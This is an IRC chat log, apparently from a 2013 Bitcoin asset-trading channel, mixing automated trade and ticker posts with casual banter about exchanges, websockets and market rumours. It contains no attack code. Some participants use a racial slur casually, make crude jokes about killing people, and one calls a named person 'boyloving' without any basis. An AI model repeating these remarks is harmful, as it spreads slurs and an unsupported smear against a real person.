23:43:48 while yourself being sort of pt Diablo-D3 Mar 31 23:43:49 such as? Mar 31 23:44:07 bitfunder is one thing, asset issuers on it are completely another Mar 31 23:44:27 ohh i see yeah it was a resller on bitfunder i take that back Mar 31 23:44:34 now i remember better thanks Mar 31 23:44:38 kakobrekla: not really Mar 31 23:44:50 DMC Assets held: Mar 31 23:44:51 106 BTC-MINING Mar 31 23:44:51 1000 BTCMC Mar 31 23:44:51 1000 ASICMINER Mar 31 23:44:54 -- Mar 31 23:45:00 kakobrekla: seeing as DMC is shutting down to fix the problem nefario caused, nope. Mar 31 23:45:02 its a fuckin pt mixup. Mar 31 23:45:18 DMC is shutting down? Mar 31 23:45:22 what happened to your billion dollar plan? Mar 31 23:45:32 thestringpuller: million, and its becoming a 200 million dollar plan Mar 31 23:45:35 see the notice in the op Mar 31 23:45:42 nah I'm too lazy Mar 31 23:45:47 [BTCTC] [ASICMINER-PT] 9 @ 0.771994 = 6.9479 BTC [-] Mar 31 23:45:50 direct links please Mar 31 23:46:21 https://bitcointalk.org/index.php?topic=77469.msg1711100#msg1711100 Mar 31 23:46:29 er wrong post Mar 31 23:46:44 https://bitcointalk.org/index.php?topic=77469.msg861305#msg861305 Mar 31 23:49:00 [HAVELOCK] [VTX] 3 @ 0.61 = 1.83 BTC [+] Mar 31 23:49:05 [BTCTC] [ASICMINER-PT] 2 @ 0.771995 = 1.544 BTC [+] Mar 31 23:49:12 not very cool. was hoping for abandoned cold war installation or such Mar 31 23:49:39 like, DC with nuclear lauch capability on site :) Mar 31 23:51:42 [BTCTC] [S.MPOE-PT] 10 @ 0.000649 = 0.0065 BTC [+] Mar 31 23:52:00 [HAVELOCK] [VTX] 19 @ 0.614888 = 11.6829 BTC [+] Mar 31 23:55:43 jurov: we may actually HAVE one up here in maine Mar 31 23:55:49 [BTCTC] [BASIC-MINING] 1 @ 0.38 BTC [+] Mar 31 23:55:58 jurov: might buy it as a tape storage vault, really Mar 31 23:57:59 [HAVELOCK] [VTX] 2 @ 0.61488 = 1.2298 BTC [-] Mar 31 23:58:50 but yeah, I cant wait until I can start phase 2 Mar 31 23:59:07 it'll drive BTC up to $1000 Apr 01 00:00:57 O_o Apr 01 00:18:00 [HAVELOCK] [SDICE] 1 @ 0.429 BTC [-] Apr 01 00:35:38 [BTCTC] [BASIC-MINING] 24 @ 0.378 = 9.072 BTC [-] Apr 01 00:37:15 [MPEX] [S.MPOE] 15200 @ 0.00062903 = 9.5613 BTC [-] Apr 01 00:37:33 [BTCTC] [ASICMINER-PT] 3 @ 0.772 = 2.316 BTC [+] Apr 01 00:37:45 [BTCTC] [ASICMINER-PT] 1 @ 0.77495 BTC [+] Apr 01 00:37:56 [BTCTC] [ASICMINER-PT] 1 @ 0.77695 BTC [+] Apr 01 00:38:02 [BTCTC] [ASICMINER-PT] 6 @ 0.777 = 4.662 BTC [+] Apr 01 00:38:33 [BTCTC] [PAJKA.BOND] 5 @ 0.105 = 0.525 BTC [-] Apr 01 00:43:33 Did I just see someone dump MPOE stock then put it into ASICMINER...? Apr 01 00:44:06 how dare they Apr 01 00:48:36 it is too high Apr 01 00:48:44 What about KLIM? Apr 01 00:48:49 !ticker h KLIM Apr 01 00:48:51 Your actions are useless. Apr 01 00:49:08 !ticker h KCIM Apr 01 00:49:09 [HAVELOCK:KCIM] 1D: 1.00000100 / 1.09894165 / 1.20900000 (17 shares, 18.68200800 BTC), 7D: 0.99500000 / 1.10475013 / 1.25000000 (60 shares, 66.28500800 BTC), 30D: 0.95500000 / 1.13694272 / 1.48000000 (161 shares, 183.04777800 BTC) Apr 01 00:49:41 !ticker h HIM Apr 01 00:49:42 [HAVELOCK:HIM] 1D: 2.00000000 / 2.00872727 / 2.08000000 (55 shares, 110.48000000 BTC), 7D: 1.41000000 / 1.79371529 / 2.08000000 (242 shares, 434.07910099 BTC), 30D: 1.40000000 / 1.77995476 / 2.08000000 (757 shares, 1347.42575265 BTC) Apr 01 00:49:43 thestringpuller: if they managed to teleport btcs from mpex to btct Apr 01 00:50:05 !ticker m S.MPOE Apr 01 00:50:06 [MPEX:S.MPOE] 1D: 0.00062903 / 0.00065976 / 0.00068374 (620725 shares, 409.54 BTC), 7D: 0.0006 / 0.00065759 / 0.00068374 (2521551 shares, 1,658.15 BTC), 30D: 0.0006 / 0.00072825 / 0.00078628 (18137686 shares, 13,208.90 BTC) Apr 01 00:53:29 [BTCTC] [RSM] 1 @ 0.0025 BTC [-] Apr 01 00:54:14 [BTCTC] [RSM] 8 @ 0.00204 = 0.0163 BTC [-] Apr 01 00:54:30 [BTCTC] [RSM] 1 @ 0.00203 BTC [-] Apr 01 00:54:32 [BTCTC] [RSM] 2 @ 0.00203 = 0.0041 BTC [-] Apr 01 00:55:26 [BTCTC] [RSM] 88 @ 0.002012 = 0.1771 BTC [-] Apr 01 00:56:05 [MPEX] [S.MPOE] 12050 @ 0.0006321 = 7.6168 BTC [+] Apr 01 00:56:07 [MPEX] [S.MPOE] 900 @ 0.00063663 = 0.573 BTC [+] Apr 01 01:00:55 ;;asks 99.999 Apr 01 01:01:02 There are currently 24624.678 bitcoins offered at or under 99.999 USD, worth 2377593.73016 USD in total. | Data vintage: 0.0014 seconds Apr 01 01:01:04 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Apr 01 01:01:40 [MPEX] [S.MPOE] 9950 @ 0.00062903 = 6.2588 BTC [-] Apr 01 01:07:58 [HAVELOCK] [KCIM] 1 @ 1 BTC [-] Apr 01 01:10:48 [BTCTC] [COGNITIVE] 3 @ 0.1599 = 0.4797 BTC [+] Apr 01 01:25:37 [BTCTC] [COGNITIVE] 1 @ 0.165 BTC [+] Apr 01 01:25:43 [BTCTC] [COGNITIVE] 1 @ 0.165 BTC [+] Apr 01 01:25:47 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [+] Apr 01 01:25:58 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [+] Apr 01 01:26:02 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [+] Apr 01 01:26:05 [BTCTC] [COGNITIVE] 17 @ 0.2 = 3.4 BTC [+] Apr 01 01:26:14 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [+] Apr 01 01:27:08 pizzaman what to you think about the poss of a sell at $99-$100 Apr 01 01:30:02 should hit that sooner or later Apr 01 01:31:26 [BTCTC] [RSM] 150 @ 0.002012 = 0.3018 BTC [-] Apr 01 01:32:13 [BTCTC] [COGNITIVE] 5 @ 0.2699 = 1.3495 BTC [+] Apr 01 01:32:17 [BTCTC] [COGNITIVE] 1 @ 0.27999 BTC [+] Apr 01 01:32:26 [BTCTC] [COGNITIVE] 10 @ 0.28 = 2.8 BTC [+] Apr 01 01:35:11 [BTCTC] [ASICMINER-PT] 1 @ 0.7789 BTC [+] Apr 01 01:37:19 [MPEX] [S.DICE] 500 @ 0.00419786 = 2.0989 BTC [+] Apr 01 01:42:52 [BTCTC] [ASICMINER-PT] 2 @ 0.7789 = 1.5578 BTC [+] Apr 01 01:46:59 [HAVELOCK] [SDICE] 3 @ 0.444 = 1.332 BTC [+] Apr 01 01:49:52 [MPEX] [S.DICE] 1000 @ 0.00419787 = 4.1979 BTC [+] Apr 01 01:50:25 [MPEX] [S.DICE] 1350 @ 0.00419788 = 5.6671 BTC [+] Apr 01 01:52:05 [MPEX] [S.MPOE] 1915 @ 0.00062903 = 1.2046 BTC [-] Apr 01 01:52:07 [MPEX] [S.MPOE] 4062 @ 0.00062878 = 2.5541 BTC [-] Apr 01 01:52:12 [MPEX] [S.MPOE] 7050 @ 0.00062244 = 4.3882 BTC [-] Apr 01 01:56:59 [HAVELOCK] [SDICE] 3 @ 0.443 = 1.329 BTC [-] Apr 01 02:01:58 [HAVELOCK] [VTX] 1 @ 0.6 BTC [-] Apr 01 02:10:19 [MPEX] [S.MPOE] 7500 @ 0.00060871 = 4.5653 BTC [-] Apr 01 02:25:59 [HAVELOCK] [VTX] 3 @ 0.59 = 1.77 BTC [-] Apr 01 02:26:00 [HAVELOCK] [VTX] 16 @ 0.58 = 9.28 BTC [-] Apr 01 02:27:45 [BTCTC] [COGNITIVE] 1 @ 0.28 BTC [+] Apr 01 02:31:59 [HAVELOCK] [VTX] 2 @ 0.61 = 1.22 BTC [+] Apr 01 02:33:59 [HAVELOCK] [VTX] 38 @ 0.61 = 23.18 BTC [+] Apr 01 02:49:19 [BTCTC] [ASICMINER-PT] 1 @ 0.77891 BTC [+] Apr 01 02:51:52 [MPEX] [S.MPOE] 8810 @ 0.00060101 = 5.2949 BTC [-] Apr 01 03:14:25 [MPEX] [S.MPOE] 7756 @ 0.00060871 = 4.7212 BTC [+] Apr 01 03:24:30 [BTCTC] [RSM] 750 @ 0.002012 = 1.509 BTC [-] Apr 01 03:25:49 hey guys Apr 01 03:25:55 anyone around? Apr 01 03:26:37 smickles: perfect Apr 01 03:26:40 ;;ticker Apr 01 03:26:46 BTCUSD ticker | Best bid: 93.01000, Best ask: 93.34999, Bid-ask spread: 0.33999, Last trade: 93.01000, 24 hour volume: 21283.09036066, 24 hour low: 91.00000, 24 hour high: 93.80000, 24 hour vwap: 92.70860 Apr 01 03:29:58 [HAVELOCK] [SDICE] 5 @ 0.446 = 2.23 BTC [+] Apr 01 03:31:33 [BTCTC] [ASICMINER-PT] 1 @ 0.779999 BTC [+] Apr 01 03:31:57 [MPEX] [S.BBET] 150 @ 0.0019999 = 0.3 BTC [+] Apr 01 03:32:00 [MPEX] [S.BBET] 9850 @ 0.00201395 = 19.8374 BTC [+] Apr 01 03:52:34 [MPEX] [S.MPOE] 33800 @ 0.00060871 = 20.5744 BTC [+] Apr 01 03:53:12 smickles: have you played around with socket.io? Apr 01 03:54:55 socket.io is lame Apr 01 03:55:01 tell me about it Apr 01 03:55:03 !ticker H HIM Apr 01 03:55:05 [HAVELOCK:HIM] 1D: 2.00000000 / 2.00872727 / 2.08000000 (55 shares, 110.48000000 BTC), 7D: 1.41000000 / 1.79371529 / 2.08000000 (242 shares, 434.07910099 BTC), 30D: 1.40000000 / 1.77995476 / 2.08000000 (757 shares, 1347.42575265 BTC) Apr 01 03:55:11 i'm trying to get a data feed from bitfloor Apr 01 03:55:14 word Apr 01 03:55:25 does socket.io work with redis.io ? Apr 01 03:55:31 but it's like socket.io guys never though "what if he wants to get info from a website he doesn't host?" Apr 01 03:56:13 or what if he isn't using a browser Apr 01 03:58:05 haven't used redis Apr 01 03:58:08 and i'm not sure Apr 01 03:58:14 i'll be back in a little bit Apr 01 03:58:37 http://try.redis.io/ Apr 01 03:58:59 [MPEX] [O.USD.P086T] 14 @ 0.12294187 = 1.7212 BTC Apr 01 03:59:00 [MPEX] [O.USD.P092T] 13 @ 0.15861729 = 2.062 BTC Apr 01 03:59:03 [MPEX] [O.USD.P089T] 14 @ 0.14008074 = 1.9611 BTC Apr 01 03:59:52 is that soebot? Apr 01 04:00:24 ;;calc 89/1.14 Apr 01 04:00:24 78.0701754386 Apr 01 04:00:28 yup Apr 01 04:00:48 MJR_III: not much socket.io for me Apr 01 04:01:05 socket.io is really nothing like redis.io... Apr 01 04:01:21 redis is a database, socket.io is more of a message passing interface/connection media Apr 01 04:01:41 its trying to implement tcp sockets into a client/server model Apr 01 04:01:59 using varius connection level media such as websockets etc Apr 01 04:07:58 [HAVELOCK] [VTX] 5 @ 0.58 = 2.9 BTC [-] Apr 01 04:07:59 [HAVELOCK] [VTX] 1 @ 0.575 BTC [-] Apr 01 04:08:01 [HAVELOCK] [VTX] 1 @ 0.57 BTC [-] Apr 01 04:08:02 [HAVELOCK] [VTX] 1 @ 0.5616 BTC [-] Apr 01 04:08:59 [HAVELOCK] [VTX] 1 @ 0.48 BTC [-] Apr 01 04:11:56 so anyway, the problem is that it's meant for browsers and javascript Apr 01 04:12:05 but i need applications to be able to talk to it Apr 01 04:12:17 dude just use curl scripts and stop whining Apr 01 04:12:25 done. problem solved. Apr 01 04:12:29 obviously you don't know what a websocket is Apr 01 04:12:35 its a streaming data feed Apr 01 04:12:40 curl would be for requests Apr 01 04:12:52 or wget Apr 01 04:13:27 the whole point of it is that you only request once Apr 01 04:13:30 I'm trollin' dude that's all I do. I'm no help. Apr 01 04:13:34 and then you have a connection Apr 01 04:13:39 hehehe, all good Apr 01 04:13:43 it lowers overhead though Apr 01 04:13:52 since you aren't sending a ton of requests all the time Apr 01 04:14:30 I've never worked on an application that requires a persistent connection Apr 01 04:14:44 a market data feed? Apr 01 04:15:02 for example, you can keep requesting all the market data...or their server can push any new orders out to you Apr 01 04:15:10 so its real time Apr 01 04:15:18 no refresh Apr 01 04:15:22 Nope. I wanted to do HFT Algo's so maybe one day I will do real time. But I've never worked on anything realtime Apr 01 04:15:30 except video games which make no monies Apr 01 04:15:33 for HFT you need real time Apr 01 04:16:21 i kno Apr 01 04:16:42 mircea_popescu: i summon thee Apr 01 04:19:24 [BTCTC] [GSDPT] 1 @ 0.00401 BTC [-] Apr 01 04:22:58 $oix Apr 01 04:23:10 !ticker m ^OIX Apr 01 04:23:12 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 81.34220013 / 93.14221262 / 140.1904003 (4085 shares, 2,444.98 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 01 04:26:18 !ticker m ^OIX Apr 01 04:26:20 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 81.34220013 / 93.14221262 / 140.1904003 (4085 shares, 2,444.98 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 01 04:26:47 ;;ticker Apr 01 04:26:52 BTCUSD ticker | Best bid: 93.38000, Best ask: 93.40001, Bid-ask spread: 0.02001, Last trade: 93.40001, 24 hour volume: 20690.03883381, 24 hour low: 91.00000, 24 hour high: 93.80000, 24 hour vwap: 92.74693 Apr 01 04:29:09 what's new Apr 01 04:30:40 game of thrones - that's what's new... Apr 01 04:31:54 like, DC with nuclear lauch capability on site :) << settle the spamhouse asshats on the spot Apr 01 04:31:57 mircea_popescu: doesn't watch that stuff Apr 01 04:32:10 ah nice, GoT started Apr 01 04:33:00 [BTCTC] [RSM] 100 @ 0.003099 = 0.3099 BTC [+] Apr 01 04:33:10 im playing path of exile. Apr 01 04:35:54 deposits flushed too Apr 01 04:38:39 http://www.nytimes.com/2013/04/01/technology/russia-begins-selectively-blocking-internet-content.html Apr 01 04:38:44 wtf is all this suicide bullshit. Apr 01 04:38:50 people want to kill themselves, their business. Apr 01 04:39:32 and yet the world continues to function, albeit imperfectly Apr 01 04:39:52 benkay \, mah nigga Apr 01 04:40:15 wtf colloquy Apr 01 04:40:22 what's up, strings. Apr 01 04:40:23 is that how you transform into gangsta version Apr 01 04:40:33 i'm demoing a new handle Apr 01 04:40:38 i've used benkay since Apr 01 04:40:41 middle school? Apr 01 04:40:43 before. Apr 01 04:41:17 how long ago is that ? Apr 01 04:41:39 i'm 25 now. Apr 01 04:41:46 i think that's the question you're really interested in answering. Apr 01 04:42:21 cool :p Apr 01 04:42:57 how old are you, mircea? Apr 01 04:43:01 mircea_popescu what was your pop's name? Apr 01 04:43:07 icyhot... related, but different.. works... Apr 01 04:43:08 Was he Mr. Popescu? Apr 01 04:43:48 actually mircea Apr 01 04:43:51 my grandfather too Apr 01 04:44:04 and im thirtysomething Apr 01 04:44:32 do your people reverse the firstname lastname thing? Apr 01 04:44:38 family/personal? Apr 01 04:44:43 sometimes Apr 01 04:45:28 the proper form (ie, popescu mircea) is used in formal context. like for instance if you sue somebody. Apr 01 04:45:49 the informal (ie, english style) is used otherwise Apr 01 04:46:32 then you're typically addressed as 'mircea'? Apr 01 04:46:50 not rly. Apr 01 04:47:03 i don't know how seriously you take this autocratic thing. i halfway imagine you might have people kissing the pavement behind you. Apr 01 04:47:12 sometimes. Apr 01 04:47:15 see? Apr 01 04:47:16 the girls usually call me master. Apr 01 04:47:29 lol Apr 01 04:47:43 no, i'm like serious and everything. Apr 01 04:48:34 like serious Apr 01 04:48:42 more like 14 Apr 01 04:48:48 and female Apr 01 04:48:59 ;) Apr 01 04:49:22 no u Apr 01 04:51:07 i kid, i kid. Apr 01 04:51:39 "A lot of software can be about egos. While the Bitcoin architecture is genius the code itself is merely adequate." Apr 01 04:51:43 heh. Apr 01 04:51:48 where printed? Apr 01 04:51:58 oh shit, baller on deck Apr 01 04:52:22 howz the stuntin icyhot Apr 01 04:52:36 stuntin hard Apr 01 04:52:51 chillin on the po'ch wiv mah forty and shorty and pit bull Apr 01 04:54:23 drank heavily this weekend. everyone's recovering. Apr 01 04:57:34 [MPEX] [S.MPOE] 6750 @ 0.00060101 = 4.0568 BTC [-] Apr 01 04:59:12 "But involving with people who write on their website that they want to kill all idiots, is dangerous for me. Sorry." Apr 01 04:59:16 what, I wrote that ?! Apr 01 04:59:55 i think it's more of an implication you make constantly. Apr 01 05:01:35 you know... i think if anyone in this world can't be suspected of holding back from what they mean to say it'd be me. Apr 01 05:05:20 also man to the rest of the world there isn't a whole lot of difference between calling people 'nigger' and saying that you want to kill all of the idiots. Apr 01 05:05:52 !? Apr 01 05:06:01 parsing your pennings can be challenging for mere mortals; imagine how confusing they must be to the rest of the internet. Apr 01 05:06:11 lol ok Apr 01 05:06:22 at least it ain't boring. Apr 01 05:06:33 i would prefer boring. Apr 01 05:06:38 why ? Apr 01 05:06:55 drama is bad for business. Apr 01 05:07:03 distracting. Apr 01 05:07:31 well for everyone's peace of mind i don't propose, contemplate or intend to kill anyone. Apr 01 05:07:33 now time for VIKINGS! Apr 01 05:07:34 seems a little silly. Apr 01 05:08:09 everything in my life is silly. Apr 01 05:08:17 i have entirely lost perspective. Apr 01 05:08:23 "what do you do?" Apr 01 05:08:27 what about if it was just yo uand Taaki on the roof with nobody looking? Apr 01 05:08:34 hard to beat that temptation Apr 01 05:08:55 im not tempted. Apr 01 05:08:55 best linux IRC app? Apr 01 05:09:06 irssi, mjr_III Apr 01 05:09:08 for one if i particularly wanted to i could probably create the event, what's it take, a few quid. Apr 01 05:09:13 no xchat. Apr 01 05:09:22 cool thx Apr 01 05:09:55 aside: moving from os x to ubuntu, i actually found myself more productive in the terminal Apr 01 05:10:46 so bitcoin hit nightly news here this week Apr 01 05:10:54 they showed amir and bruce wagner Apr 01 05:11:00 I fucking raged Apr 01 05:11:10 lol Apr 01 05:11:19 where are you, turkmenistan ?\ Apr 01 05:11:26 outer Apr 01 05:11:34 outer turkmenistan ? Apr 01 05:11:39 yes Apr 01 05:11:48 well trade your tv for a camel Apr 01 05:12:22 wait. bruce wagner, the tv star ? Apr 01 05:12:42 yeah the boyloving youtube sensation Apr 01 05:12:57 wow i thought he's gone Apr 01 05:13:06 high tide brings all the scum back to shore eh Apr 01 05:13:09 hi all Apr 01 05:13:26 xchat is really nice Apr 01 05:13:30 i like the layout, thanks mircea_popescu Apr 01 05:13:34 hey there Apr 01 05:13:35 i think it was an ancient clip but this is the press bitcoin has Apr 01 05:13:50 Help us reach our goal! Bitcoinstore must sell $850,000 by June, 30 to keep its competitive prices. $0 reached of $850,000 Apr 01 05:13:51 i know that name Apr 01 05:13:53 that seems promising Apr 01 05:13:59 <[\\\]> that's just stupid Apr 01 05:14:11 <[\\\]> if you have to beg people to shop, then it isn't serving the original purpose Apr 01 05:14:13 i knew he would get an extention Apr 01 05:14:48 [\\\] i would hope my sarcasm is not squandered. Apr 01 05:15:00 <[\\\]> I'm 12 and what is this? Apr 01 05:15:09 $avg Apr 01 05:15:11 smickles: 92.70 Apr 01 05:15:19 ;;calc 68/92.7 Apr 01 05:15:21 0.733549083064 Apr 01 05:15:32 I think it will hit 850k by july 1 Apr 01 05:15:40 Bugpowder from 0 ? Apr 01 05:15:41 they did 450 basically this month Apr 01 05:16:03 I can't find ASIC mining rigs on bitcoinstore Apr 01 05:16:15 look under cupcakes. Apr 01 05:16:53 "BOOM. While you've been out poppin' bottles with models, the Payward team has been slaving away at a proper exchange for arbitrary cyborg-alien currencies of the future, and bitcoin." Apr 01 05:16:55 what the fuck srslty. Apr 01 05:18:15 url please Apr 01 05:18:21 payward.com Apr 01 05:18:57 https://bitcointalk.org/index.php?topic=159974.0 Apr 01 05:19:47 seems legit Apr 01 05:19:59 :-| Apr 01 05:20:18 tee hee Apr 01 05:20:26 filled with lorem ipsum. Apr 01 05:20:46 pretty charts though. Apr 01 05:20:55 ;;bc,stats Apr 01 05:21:02 Current Blocks: 229025 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 798 blocks | Next Difficulty In About: 4 days, 13 hours, 26 minutes, and 23 seconds | Next Difficulty Estimate: 7456274.96836 | Estimated Percent Change: 11.35706 Apr 01 05:21:05 lol Apr 01 05:22:37 he does have confidence Apr 01 05:22:39 you gotta give em that Apr 01 05:22:54 competence >> confidence Apr 01 05:23:03 it was a joke Apr 01 05:23:16 that whole forum post was like LOL WTF, dude, Apr 01 05:23:29 [MPEX] [X.IDIFF.JUN] 60 @ 0.1375 = 8.25 BTC [+] Apr 01 05:23:34 we'll see Apr 01 05:23:37 the whole bitcoin economy is like LOL WTF dude Apr 01 05:23:38 the more the merrier Apr 01 05:23:41 hehehe Apr 01 05:24:10 well...it kinda seemed like "our focus group tells us that these "memes" have the highest probablity of going "viral" Apr 01 05:24:32 like over the top Apr 01 05:24:36 but eh, w/e Apr 01 05:25:00 does anyone know of a simple socket.io console app? Apr 01 05:25:38 at least jesse powell is not *completely* out of the financial loop Apr 01 05:26:32 so wait, is kraken and payward two separate things? Apr 01 05:27:08 looks like a dba sort of thing Apr 01 05:27:15 dba? Apr 01 05:27:58 better than most out there now Apr 01 05:28:05 but we'll see how the matching engine is Apr 01 05:28:21 at least they put a level 2 data book together in the right order Apr 01 05:30:26 anyway, i'm out. have a ball all. Apr 01 05:31:21 <@assbot> [MPEX] [X.IDIFF.JUN] 60 @ 0.1375 = 8.25 BTC [+] bye Apr 01 05:33:14 later Apr 01 05:33:34 damn it feels good to be back on linux Apr 01 05:33:41 awww yeah Apr 01 05:34:15 KRS1, you know anything about websockets (specifically socket.io)? Apr 01 05:34:34 not really im a sysadmin but i know what socket.io is Apr 01 05:34:38 yeah Apr 01 05:34:41 its tough Apr 01 05:34:44 looking to interface with mtgox? Apr 01 05:34:47 these web libraries keep changing Apr 01 05:34:52 bitfloor actually Apr 01 05:34:59 i'd lose my mind if i was a web developer Apr 01 05:35:10 its fun cuz of how quickly you can develop Apr 01 05:35:16 but i have to support all the crap they do where I work Apr 01 05:35:18 but sucks cuz of how quickly you can develop Apr 01 05:35:26 yeah..wasnt always like that **** BEGIN LOGGING AT Mon Apr 1 14:43:41 2013 Apr 01 14:43:45 BTCUSD ticker | Best bid: 94.50090, Best ask: 94.69989, Bid-ask spread: 0.19899, Last trade: 94.50090, 24 hour volume: 27511.68644631, 24 hour low: 91.00000, 24 hour high: 94.84000, 24 hour vwap: 93.17817 Apr 01 14:46:42 [BTCTC] [ASICMINER-PT] 3 @ 0.749999 = 2.25 BTC [+] Apr 01 14:47:50 [BTCTC] [GSDPT] 19 @ 0.00402 = 0.0764 BTC [-] Apr 01 14:47:50 ;;ticker Apr 01 14:47:56 BTCUSD ticker | Best bid: 94.50091, Best ask: 95.00000, Bid-ask spread: 0.49909, Last trade: 94.50091, 24 hour volume: 29869.63042979, 24 hour low: 91.00000, 24 hour high: 95.00000, 24 hour vwap: 93.31910 Apr 01 14:48:10 [BTCTC] [GSDPT] 52 @ 0.004015 = 0.2088 BTC [-] Apr 01 14:49:29 rally Apr 01 14:49:34 [BTCTC] [GSDPT] 75 @ 0.004 = 0.3 BTC [-] Apr 01 14:49:56 [BTCTC] [ASICMINER-PT] 1 @ 0.749999 BTC [+] Apr 01 15:02:27 ;;ticker Apr 01 15:02:34 BTCUSD ticker | Best bid: 96.31000, Best ask: 96.44638, Bid-ask spread: 0.13638, Last trade: 96.44638, 24 hour volume: 32642.44526573, 24 hour low: 91.00000, 24 hour high: 96.75001, 24 hour vwap: 93.54613 Apr 01 15:04:38 97 Apr 01 15:05:00 I guess everyone's wire transfers are clearing? Apr 01 15:05:27 [BTCTC] [COGNITIVE] 1 @ 0.2899 BTC [+] Apr 01 15:05:54 must be hehe Apr 01 15:06:40 its holiday here Apr 01 15:06:48 no transfers to bitstamp today Apr 01 15:06:54 dunno for the rest of yurop Apr 01 15:07:00 they will be fucked tomorrow Apr 01 15:07:08 98 Apr 01 15:07:13 ;;ticker Apr 01 15:07:20 BTCUSD ticker | Best bid: 97.97000, Best ask: 98.00000, Bid-ask spread: 0.03000, Last trade: 98.00000, 24 hour volume: 32642.44526573, 24 hour low: 91.00000, 24 hour high: 96.75001, 24 hour vwap: 93.54613 Apr 01 15:07:25 ticker is late Apr 01 15:07:36 [MPEX] [O.USD.P200T] 1000 @ 1.14429181 = 1144.2918 BTC [-] Apr 01 15:07:37 i looking at socket via moody Apr 01 15:07:41 ;;ticker --websocket Apr 01 15:07:41 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Apr 01 15:07:41 lol ouch Apr 01 15:07:41 :P Apr 01 15:08:57 [MPEX] [O.USD.C098T] 1000 @ 0.22316625 = 223.1663 BTC [+] Apr 01 15:08:59 [MPEX] [O.USD.C095T] 1000 @ 0.23774495 = 237.745 BTC Apr 01 15:09:11 !ticker m ^oix Apr 01 15:09:12 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 86.04499804 / 97.29593865 / 133.95274683 (7085 shares, 4,050.18 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 01 15:10:01 Average Transaction 59.98743815 BTC Apr 01 15:10:04 when to sell? 100 might trigger -10%? Apr 01 15:10:09 dude srlsy... i gotta raise the reg fee. Apr 01 15:15:32 ;;later tell bugpowder : here's an idea : make hashing processors out of dragonfly brains. Apr 01 15:15:32 The operation succeeded. Apr 01 15:16:57 [MPEX] [O.USD.C095T] 40 @ 0.23959342 = 9.5837 BTC [+] Apr 01 15:17:20 ;;ticker Apr 01 15:17:26 BTCUSD ticker | Best bid: 97.50000, Best ask: 97.79855, Bid-ask spread: 0.29855, Last trade: 97.79855, 24 hour volume: 35881.21447432, 24 hour low: 91.00000, 24 hour high: 98.10000, 24 hour vwap: 93.88708 Apr 01 15:17:53 ;;bc,stats Apr 01 15:18:00 Current Blocks: 229120 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 703 blocks | Next Difficulty In About: 3 days, 13 hours, 38 minutes, and 40 seconds | Next Difficulty Estimate: 7622306.53365 | Estimated Percent Change: 13.83668 Apr 01 15:18:18 rising pretty briskly Apr 01 15:18:23 ;;estimate Apr 01 15:18:29 Next difficulty estimate | 7622306.53365 based on data since last change | 8365365.88258 based on data for last three days Apr 01 15:22:54 ;;asks 99.99 Apr 01 15:22:54 There are currently 8305.4313 bitcoins offered at or under 99.99 USD, worth 822387.920549 USD in total. | Data vintage: 17.7274 seconds Apr 01 15:28:32 [MPEX] [S.MPOE] 2400 @ 0.0006 = 1.44 BTC [-] Apr 01 15:30:01 bitcoinity lol Apr 01 15:30:17 http://slashdot.org/submission/2576047/mtgox-to-accept-litecoin-virtual-currency oh wow Apr 01 15:31:01 watchout, its April 1 Apr 01 15:31:04 lol Apr 01 15:31:16 people could lose money speculative buying on that news Apr 01 15:31:43 :) Apr 01 15:31:54 ohh Apr 01 15:31:59 so that killed the bibet Apr 01 15:32:06 makes perfect sense now Apr 01 15:32:19 https://data.mtgox.com/api/2/LTCUSD/money/ticker Apr 01 15:32:45 so watch for quick rises in btc? Apr 01 15:32:57 maybe? Apr 01 15:33:07 im not so sure its a joke Apr 01 15:33:14 yeah not sure either Apr 01 15:33:30 April 1 is really a terrible day to issue real press releases though Apr 01 15:33:43 well, its not like gox did Apr 01 15:33:57 idk..Submitted by Anonymous Coward Apr 01 15:34:16 i know who submited it, he thinks its nt a joke Apr 01 15:34:26 but he could have been tricked by the org source Apr 01 15:34:34 anyway if true... Apr 01 15:34:52 youll be even richer, we know ;) Apr 01 15:34:53 i could see $10ltc soon easy Apr 01 15:35:12 well, if true $1 ltc is cheap Apr 01 15:35:33 id like to make sure however before trading on this news Apr 01 15:36:17 yes sell all btc asap Apr 01 15:36:38 ;;bids 0 Apr 01 15:36:44 what Apr 01 15:36:46 There are currently 34850658 bitcoins demanded at or over 0.0 USD, worth 9905365.67608 USD in total. | Data vintage: 0.0091 seconds Apr 01 15:36:50 srsly Apr 01 15:37:14 I di quitel ike this thing though: http://www.listentobitcoin.com/ Apr 01 15:37:32 https://data.mtgox.com/api/2/LTCEUR/money/ticker Apr 01 15:38:41 CHM neat Apr 01 15:39:30 yeah was listenitng last night, wish there was some correlation between exchange price direction and the sounds, would be much nicer to listen to than clark moody Apr 01 15:39:57 100 is going down today Apr 01 15:40:13 as I suspected... Apr 01 15:40:48 ;;ticker Apr 01 15:41:05 BTCUSD ticker | Best bid: 98.00000, Best ask: 98.19999, Bid-ask spread: 0.19999, Last trade: 98.19999, 24 hour volume: 38061.25816406, 24 hour low: 91.00000, 24 hour high: 98.39650, 24 hour vwap: 94.10042 Apr 01 15:41:25 wonder if i should order some champagne Apr 01 15:42:09 is on the fridge from last week Apr 01 15:42:14 [MPEX] [S.DICE] 2200 @ 0.00395455 = 8.7 BTC [-] Apr 01 15:42:19 srsly Apr 01 15:44:56 mine is too, but now traveling Apr 01 15:45:21 i have two bots in the truck as well but its very hot now Apr 01 15:48:20 its gone down a bit on god Apr 01 15:48:21 gox Apr 01 15:48:31 not 